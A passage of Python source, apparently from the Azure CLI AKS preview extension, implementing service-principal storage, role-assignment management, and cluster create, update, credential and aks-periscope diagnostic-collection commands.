# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist the service principal/secret for *subscription_id* into the
    CLI config directory, merging with any previously stored entries."""
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal
    config_path = os.path.join(get_config_dir(), file_name)
    all_principals = load_service_principals(config_path=config_path) or {}
    all_principals[subscription_id] = entry
    # 0600: the file holds credentials, so restrict access to the owner.
    fd = os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w+') as sp_file:
        json.dump(all_principals, sp_file)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored service-principal entry for *subscription_id*,
    or None when nothing has been stored."""
    config_path = os.path.join(get_config_dir(), file_name)
    all_principals = load_service_principals(config_path)
    return all_principals.get(subscription_id) if all_principals else None
def load_service_principals(config_path):
    """Parse the stored service-principal JSON file.

    Returns the parsed mapping, or None when the file is missing or cannot
    be read/parsed (best-effort: corrupt state is treated as absent).
    """
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as sp_file:
            return shell_safe_json_parse(sp_file.read())
    except:  # pylint: disable=bare-except
        return None
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None):
    """Create an AAD application, translating a permissions failure into a
    CLIError that points at the setup documentation."""
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
                                                         key_usage=key_usage, start_date=start_date, end_date=end_date)
    create_params = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
                                                display_name=display_name,
                                                identifier_uris=identifier_uris,
                                                homepage=homepage,
                                                reply_urls=reply_urls,
                                                key_credentials=key_creds,
                                                password_credentials=password_creds)
    try:
        return client.create(create_params)
    except GraphErrorException as ex:
        # Only the "insufficient privileges" case gets the friendly message.
        if 'insufficient privileges' not in str(ex).lower():
            raise
        link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
        raise CLIError("Directory permission is needed for the current user to register the application. "
                       "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
def _build_application_creds(password=None, key_value=None, key_type=None,
                             key_usage=None, start_date=None, end_date=None):
    """Build (password_credentials, key_credentials) for an AAD application.

    At most one of *password* / *key_value* may be supplied. Dates default
    to now .. now + 1 year and may be given as ISO strings.
    """
    if password and key_value:
        raise CLIError(
            'specify either --password or --key-value, but not both.')
    # Normalize the validity window: default it, then parse string inputs.
    if not start_date:
        start_date = datetime.datetime.utcnow()
    if isinstance(start_date, str):
        start_date = parse(start_date)
    if not end_date:
        end_date = start_date + relativedelta(years=1)
    if isinstance(end_date, str):
        end_date = parse(end_date)
    key_type = key_type or 'AsymmetricX509Cert'
    key_usage = key_usage or 'Verify'
    password_creds = None
    key_creds = None
    if password:
        password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
                                             key_id=str(uuid.uuid4()), value=password)]
    elif key_value:
        key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
                                   key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
    return password_creds, key_creds
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an existing AAD application.

    *identifier* may be an appId GUID, an identifier URI, or — as a final
    fallback — an application object id.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not resolve_app:
        app_id = identifier
    else:
        try:
            uuid.UUID(identifier)
            # Parses as a GUID: look the application up by appId.
            matches = list(rbac_client.applications.list(
                filter="appId eq '{}'".format(identifier)))
        except ValueError:
            # Not a GUID: treat it as an identifier URI.
            matches = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not matches:  # assume we get an object id
            matches = [rbac_client.applications.get(identifier)]
        app_id = matches[0].app_id
    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments either by explicit id list or by
    assignee/role/scope filters.

    When called with no filters at all (and no --yes), prompts before
    wiping every assignment under the subscription.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        # Explicit ids are exclusive with every other selector.
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError(
                'When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # Fixed: `assignee` appeared twice in this list in the original.
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
        from knack.prompting import prompt_y_n
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = build_role_scope(resource_group_name, scope,
                             assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete role assignments for *service_principal*, retrying around AAD
    propagation delays.

    Retries up to 10 times with linearly growing sleeps. Returns True on
    success, False if every attempt failed with a CloudError; CLIError is
    re-raised immediately.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete',
                 value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError:
            # Re-raise user-facing errors untouched; a bare `raise` keeps the
            # original traceback (the previous `raise ex` re-raised from here).
            raise
        except CloudError as ex:
            # Transient service error: log and back off (delay, 2*delay, ...).
            logger.info(ex)
            time.sleep(delay + delay * x)
    else:
        # Loop exhausted without a break: every attempt failed.
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """Find role assignments matching the given scope/assignee/role filters.

    Listing strategy: an explicit *scope* wins (can reach beyond the
    subscription, e.g. management groups); otherwise list by assignee if
    given, else list everything. Post-filters by scope, role and assignee.
    """
    assignee_object_id = None
    if assignee:
        assignee_object_id = resolve_object_id(cli_ctx, assignee)
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            # Includes assignments granted via the assignee's group memberships.
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # Keep an assignment when no scope filter is set, OR (with
        # include_inherited) its scope is a case-insensitive prefix-match of
        # the requested scope, OR its scope equals the requested scope.
        # NOTE: relies on `and` binding tighter than `or`.
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
    """Return True if a Network Contributor role assignment already exists
    at exactly *scope*."""
    # Well-known role definition id of the built-in "Network Contributor" role.
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
    assignments_client = get_auth_management_client(cli_ctx, scope).role_assignments
    return any(
        assignment.scope == scope and assignment.role_definition_id.endswith(network_contributor_role_id)
        for assignment in assignments_client.list_for_scope(scope=scope, filter='atScope()')
    )
# Case-insensitive matcher splitting a user-assigned identity resource id
# into (subscription id, resource group, identity name).
_re_user_assigned_identity_resource_id = re.compile(
    r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
    flags=re.IGNORECASE)


def _get_user_assigned_identity(cli_ctx, resource_id):
    """Resolve a user-assigned identity resource id to the identity object.

    :raises CLIError: when the id cannot be parsed, the identity does not
        exist, or the service call fails.
    """
    resource_id = resource_id.lower()
    match = _re_user_assigned_identity_resource_id.search(resource_id)
    if match:
        subscription_id = match.group(1)
        resource_group_name = match.group(2)
        identity_name = match.group(3)
        msi_client = get_msi_client(cli_ctx, subscription_id)
        try:
            identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                               resource_name=identity_name)
        except CloudError as ex:
            # Distinguish "not found" from other service errors for a clearer message.
            if 'was not found' in ex.message:
                raise CLIError("Identity {} not found.".format(resource_id))
            raise CLIError(ex.message)
        return identity
    raise CLIError(
        "Cannot parse identity name from provided resource id {}.".format(resource_id))
# Case-insensitive matcher splitting a snapshot resource id into
# (subscription id, resource group, snapshot name).
_re_snapshot_resource_id = re.compile(
    r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
    flags=re.IGNORECASE)


def _get_snapshot(cli_ctx, snapshot_id):
    """Resolve a snapshot resource id to the snapshot object.

    :raises InvalidArgumentValueError: when the id cannot be parsed or the
        snapshot does not exist.
    :raises CLIError: for any other service error.
    """
    snapshot_id = snapshot_id.lower()
    match = _re_snapshot_resource_id.search(snapshot_id)
    if match:
        subscription_id = match.group(1)
        resource_group_name = match.group(2)
        snapshot_name = match.group(3)
        snapshot_client = cf_snapshots_client(cli_ctx, subscription_id=subscription_id)
        try:
            snapshot = snapshot_client.get(resource_group_name, snapshot_name)
        except CloudError as ex:
            # Distinguish "not found" from other service errors for a clearer message.
            if 'was not found' in ex.message:
                raise InvalidArgumentValueError("Snapshot {} not found.".format(snapshot_id))
            raise CLIError(ex.message)
        return snapshot
    raise InvalidArgumentValueError(
        "Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
    cmd,
    client,
    resource_group_name,
    name,
    disable_browser=False,
    listen_address="127.0.0.1",
    listen_port="8001",
):
    """Open the Kubernetes dashboard of a managed cluster.

    Thin wrapper delegating to the core CLI's _aks_browse, passing the
    preview resource type so the preview SDK models are used.
    """
    from azure.cli.command_modules.acs.custom import _aks_browse
    return _aks_browse(
        cmd,
        client,
        resource_group_name,
        name,
        disable_browser,
        listen_address,
        listen_port,
        CUSTOM_MGMT_AKS_PREVIEW,
    )
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(cmd, client, resource_group_name, cluster_name):
    """List all maintenance configurations of a managed cluster.

    `cmd` is unused but required by the CLI command signature contract.
    """
    return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(cmd, client, resource_group_name, cluster_name, config_name):
    """Show a single maintenance configuration of a managed cluster."""
    # Surface the resolved identifiers to the user before the service call.
    logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
                   resource_group_name, cluster_name, config_name)
    return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(cmd, client, resource_group_name, cluster_name, config_name):
    """Delete a maintenance configuration from a managed cluster."""
    # Surface the resolved identifiers to the user before the service call.
    logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
                   resource_group_name, cluster_name, config_name)
    return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
    cmd,
    client,
    resource_group_name,
    cluster_name,
    config_name,
    config_file,
    weekday,
    start_hour
):
    """Add a new maintenance configuration; fails if *config_name* exists.

    :raises CLIError: when a configuration with the same name already exists.
    """
    configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
    for config in configs:
        if config.name == config_name:
            # Fixed typo in the user-facing message: 'maitenance' -> 'maintenance'.
            raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
                           "use 'aks maintenanceconfiguration list' to get current list of maintenance configurations".format(config_name))
    return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
    cmd,
    client,
    resource_group_name,
    cluster_name,
    config_name,
    config_file,
    weekday,
    start_hour
):
    """Update an existing maintenance configuration.

    :raises CLIError: when no configuration named *config_name* exists.
    """
    configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
    # any() replaces the original found-flag loop.
    if not any(config.name == config_name for config in configs):
        # Fixed user-facing message: 'maitenance' -> 'maintenance' and the
        # missing space after the first sentence.
        raise CLIError("Maintenance configuration '{}' doesn't exist. "
                       "use 'aks maintenanceconfiguration list' to get current list of maintenance configurations".format(config_name))
    return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
               client,
               resource_group_name,
               name,
               ssh_key_value,
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size=None,
               node_osdisk_type=None,
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               enable_vmss=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               os_sku=None,
               enable_fips_image=False,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               pod_cidr=None,
               service_cidr=None,
               pod_cidrs=None,
               service_cidrs=None,
               ip_families=None,
               dns_service_ip=None,
               docker_bridge_address=None,
               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_managed_outbound_ipv6_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               nat_gateway_managed_outbound_ip_count=None,
               nat_gateway_idle_timeout=None,
               outbound_type=None,
               enable_addons=None,
               workspace_resource_id=None,
               enable_msi_auth_for_monitoring=False,
               min_count=None,
               max_count=None,
               vnet_subnet_id=None,
               pod_subnet_id=None,
               ppg=None,
               max_pods=0,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               node_zones=None,
               enable_node_public_ip=False,
               node_public_ip_prefix_id=None,
               generate_ssh_keys=False,  # pylint: disable=unused-argument
               enable_pod_security_policy=False,
               node_resource_group=None,
               uptime_sla=False,
               attach_acr=None,
               enable_private_cluster=False,
               private_dns_zone=None,
               enable_managed_identity=True,
               fqdn_subdomain=None,
               disable_public_fqdn=False,
               api_server_authorized_ip_ranges=None,
               aks_custom_headers=None,
               appgw_name=None,
               appgw_subnet_prefix=None,
               appgw_subnet_cidr=None,
               appgw_id=None,
               appgw_subnet_id=None,
               appgw_watch_namespace=None,
               enable_aad=False,
               enable_azure_rbac=False,
               aad_admin_group_object_ids=None,
               aci_subnet_name=None,
               enable_sgxquotehelper=False,
               kubelet_config=None,
               linux_os_config=None,
               http_proxy_config=None,
               assign_identity=None,
               auto_upgrade_channel=None,
               enable_pod_identity=False,
               enable_pod_identity_with_kubenet=False,
               enable_encryption_at_host=False,
               enable_ultra_ssd=False,
               edge_zone=None,
               enable_secret_rotation=False,
               rotation_poll_interval=None,
               disable_local_accounts=False,
               no_wait=False,
               assign_kubelet_identity=None,
               workload_runtime=None,
               gpu_instance_profile=None,
               enable_windows_gmsa=False,
               gmsa_dns_server=None,
               gmsa_root_domain_name=None,
               snapshot_id=None,
               enable_oidc_issuer=False,
               crg_id=None,
               yes=False):
    """Create a managed cluster (preview).

    All parameters are captured wholesale via locals() and handed to the
    decorator, which validates them and builds the managed-cluster model.
    """
    # DO NOT MOVE: get all the original parameters and save them as a dictionary
    # (locals() must run before ANY local variable is introduced, otherwise
    # non-parameter names would leak into the raw parameter dict).
    raw_parameters = locals()
    from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
    from azure.cli.command_modules.acs.decorator import AKSParamDict
    from .decorator import AKSPreviewCreateDecorator
    # decorator pattern
    aks_create_decorator = AKSPreviewCreateDecorator(
        cmd=cmd,
        client=client,
        raw_parameters=AKSParamDict(raw_parameters),
        resource_type=CUSTOM_MGMT_AKS_PREVIEW,
    )
    try:
        # construct mc profile
        mc = aks_create_decorator.construct_mc_preview_profile()
    except DecoratorEarlyExitException:
        # exit gracefully
        return None
    # send request to create a real managed cluster
    return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd,  # pylint: disable=too-many-statements,too-many-branches,too-many-locals
               client,
               resource_group_name,
               name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None, no_wait=False,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_managed_outbound_ipv6_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               nat_gateway_managed_outbound_ip_count=None,
               nat_gateway_idle_timeout=None,
               api_server_authorized_ip_ranges=None,
               enable_pod_security_policy=False,
               disable_pod_security_policy=False,
               attach_acr=None,
               detach_acr=None,
               uptime_sla=False,
               no_uptime_sla=False,
               enable_aad=False,
               aad_tenant_id=None,
               aad_admin_group_object_ids=None,
               enable_ahub=False,
               disable_ahub=False,
               aks_custom_headers=None,
               auto_upgrade_channel=None,
               enable_managed_identity=False,
               assign_identity=None,
               enable_pod_identity=False,
               enable_pod_identity_with_kubenet=False,
               disable_pod_identity=False,
               enable_secret_rotation=False,
               disable_secret_rotation=False,
               rotation_poll_interval=None,
               disable_local_accounts=False,
               enable_local_accounts=False,
               enable_public_fqdn=False,
               disable_public_fqdn=False,
               yes=False,
               tags=None,
               nodepool_labels=None,
               windows_admin_password=None,
               enable_azure_rbac=False,
               disable_azure_rbac=False,
               enable_windows_gmsa=False,
               gmsa_dns_server=None,
               gmsa_root_domain_name=None,
               enable_oidc_issuer=False):
    """Update an existing managed cluster (preview).

    All parameters are captured wholesale via locals() and handed to the
    decorator, which validates them and patches the managed-cluster model.
    """
    # DO NOT MOVE: get all the original parameters and save them as a dictionary
    # (locals() must run before ANY local variable is introduced, otherwise
    # non-parameter names would leak into the raw parameter dict).
    raw_parameters = locals()
    from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
    from azure.cli.command_modules.acs.decorator import AKSParamDict
    from .decorator import AKSPreviewUpdateDecorator
    # decorator pattern
    aks_update_decorator = AKSPreviewUpdateDecorator(
        cmd=cmd,
        client=client,
        raw_parameters=AKSParamDict(raw_parameters),
        resource_type=CUSTOM_MGMT_AKS_PREVIEW,
    )
    try:
        # update mc profile
        mc = aks_update_decorator.update_mc_preview_profile()
    except DecoratorEarlyExitException:
        # exit gracefully
        return None
    # send request to update the real managed cluster
    return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
    """Fetch a managed cluster and strip noisy null fields for display."""
    managed_cluster = client.get(resource_group_name, name)
    return _remove_nulls([managed_cluster])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd,  # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        name,
                        admin=False,
                        user='clusterUser',
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        overwrite_existing=False,
                        context_name=None,
                        public_fqdn=False):
    """Fetch cluster credentials and merge/print the kubeconfig.

    Picks the credential endpoint by role: admin credentials when *admin*
    is set, otherwise user credentials chosen by the (case-insensitive)
    *user* value — 'clusterUser' or 'clusterMonitoringUser'.

    :raises CLIError: for an unknown user, empty credential result, or an
        unreadable kubeconfig payload.
    """
    credentialResults = None
    serverType = None
    if public_fqdn:
        # Request the public endpoint variant of the kubeconfig.
        serverType = 'public'
    if admin:
        credentialResults = client.list_cluster_admin_credentials(
            resource_group_name, name, serverType)
    else:
        if user.lower() == 'clusteruser':
            credentialResults = client.list_cluster_user_credentials(
                resource_group_name, name, serverType)
        elif user.lower() == 'clustermonitoringuser':
            credentialResults = client.list_cluster_monitoring_user_credentials(
                resource_group_name, name, serverType)
        else:
            raise CLIError("The user is invalid.")
    if not credentialResults:
        raise CLIError("No Kubernetes credentials found.")
    try:
        # Only the first kubeconfig returned is used.
        kubeconfig = credentialResults.kubeconfigs[0].value.decode(
            encoding='UTF-8')
        _print_or_merge_credentials(
            path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd,    # pylint: disable=too-many-statements,too-many-locals
                client,
                resource_group_name,
                name,
                storage_account=None,
                sas_token=None,
                container_logs=None,
                kube_objects=None,
                node_logs=None):
    """Collect diagnostic information from an AKS cluster via aks-periscope.

    After interactive confirmation, deploys the aks-periscope daemon set to
    the cluster and uploads the collected logs/diagnostics to a container
    (named after the cluster FQDN) in a storage account.

    :param storage_account: Name or resource ID of the target storage
        account; when omitted, the account from the cluster's diagnostic
        settings is used.
    :param sas_token: Pre-generated SAS token; when omitted, read-write and
        read-only tokens valid for 24h are generated from the account keys.
    :param container_logs: Extra value(s) appended to periscope's
        DIAGNOSTIC_CONTAINERLOGS_LIST setting.
    :param kube_objects: Extra value(s) appended to DIAGNOSTIC_KUBEOBJECTS_LIST.
    :param node_logs: Extra value(s) appended to DIAGNOSTIC_NODELOGS_LIST.
    :raises CLIError: if kubectl is missing, no storage account can be
        determined, or deploying periscope fails.
    """
    colorama.init()

    mc = client.get(resource_group_name, name)

    # Periscope is deployed with kubectl; fail fast if it is unavailable.
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')

    storage_account_id = None
    if storage_account is None:
        print("No storage account specified. Try getting storage account from diagnostic settings")
        storage_account_id = get_storage_account_from_diag_settings(
            cmd.cli_ctx, resource_group_name, name)
        if storage_account_id is None:
            raise CLIError(
                "A storage account must be specified, since there isn't one in the diagnostic settings.")

    from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
                                   resource_id)
    # Normalize a bare account name into a full resource ID in the cluster's
    # subscription and resource group.
    if storage_account_id is None:
        if not is_valid_resource_id(storage_account):
            storage_account_id = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Storage', type='storageAccounts',
                name=storage_account
            )
        else:
            storage_account_id = storage_account

    if is_valid_resource_id(storage_account_id):
        try:
            parsed_storage_account = parse_resource_id(storage_account_id)
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        raise CLIError("Invalid storage account id %s" % storage_account_id)

    storage_account_name = parsed_storage_account['name']

    readonly_sas_token = None
    if sas_token is None:
        # No token supplied: derive one from the account keys. The read-write
        # token is embedded into the deployment; a separate read-only token is
        # used for the URL shown to the user.
        storage_client = cf_storage(
            cmd.cli_ctx, parsed_storage_account['subscription'])
        storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
                                                                         storage_account_name)
        kwargs = {
            'account_name': storage_account_name,
            'account_key': storage_account_keys.keys[0].value
        }
        cloud_storage_client = cloud_storage_account_service_factory(
            cmd.cli_ctx, kwargs)

        sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rwdlacup',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))

        readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rl',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))

        readonly_sas_token = readonly_sas_token.strip('?')

    from knack.prompting import prompt_y_n

    print()
    print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
          f'save them to the storage account '
          f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
          f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
    print()
    print('If you share access to that storage account to Azure support, you consent to the terms outlined'
          f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
    print()
    if not prompt_y_n('Do you confirm?', default="n"):
        return

    print()
    print("Getting credentials for cluster %s " % name)
    _, temp_kubeconfig_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name,
                        name, admin=True, path=temp_kubeconfig_path)

    print()
    print("Starts collecting diag info for cluster %s " % name)

    # Derive the storage container name from the cluster FQDN, truncated at
    # "-hcp-" (or at the 63-character container-name limit when absent). See:
    # https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
    maxContainerNameLength = 63
    fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
    normalized_container_name = fqdn.replace('.', '-')
    # BUG FIX: str.find returns -1 when "-hcp-" is absent; the original used
    # str.index, which raises ValueError instead and made the -1 fallback
    # below unreachable (crashing on FQDNs without "-hcp-").
    len_of_container_name = normalized_container_name.find("-hcp-")
    if len_of_container_name == -1:
        len_of_container_name = maxContainerNameLength
    container_name = normalized_container_name[:len_of_container_name]

    sas_token = sas_token.strip('?')

    # Fill the placeholders in the bundled periscope deployment YAML.
    deployment_yaml = _read_periscope_yaml()
    deployment_yaml = deployment_yaml.replace("# <accountName, string>", storage_account_name)
    deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
                                              (base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
    deployment_yaml = deployment_yaml.replace("# <containerName, string>", container_name)

    yaml_lines = deployment_yaml.splitlines()
    for index, line in enumerate(yaml_lines):
        # Append any user-supplied selectors to periscope's diagnostic lists.
        if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
            yaml_lines[index] = line + ' ' + container_logs
        if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
            yaml_lines[index] = line + ' ' + kube_objects
        if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
            yaml_lines[index] = line + ' ' + node_logs
    deployment_yaml = '\n'.join(yaml_lines)

    fd, temp_yaml_path = tempfile.mkstemp()
    temp_yaml_file = os.fdopen(fd, 'w+t')
    try:
        temp_yaml_file.write(deployment_yaml)
        temp_yaml_file.flush()
        temp_yaml_file.close()
        try:
            print()
            print("Cleaning up aks-periscope resources if existing")

            # Best-effort deletion of artifacts from a previous run; return
            # codes are deliberately not checked.
            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "serviceaccount,configmap,daemonset,secret",
                             "--all", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding-view", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRole",
                             "aks-periscope-role", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "--all",
                             "apd", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.DEVNULL)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "CustomResourceDefinition",
                             "diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            print()
            print("Deploying aks-periscope")

            subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
                                     temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            raise CLIError(err.output)
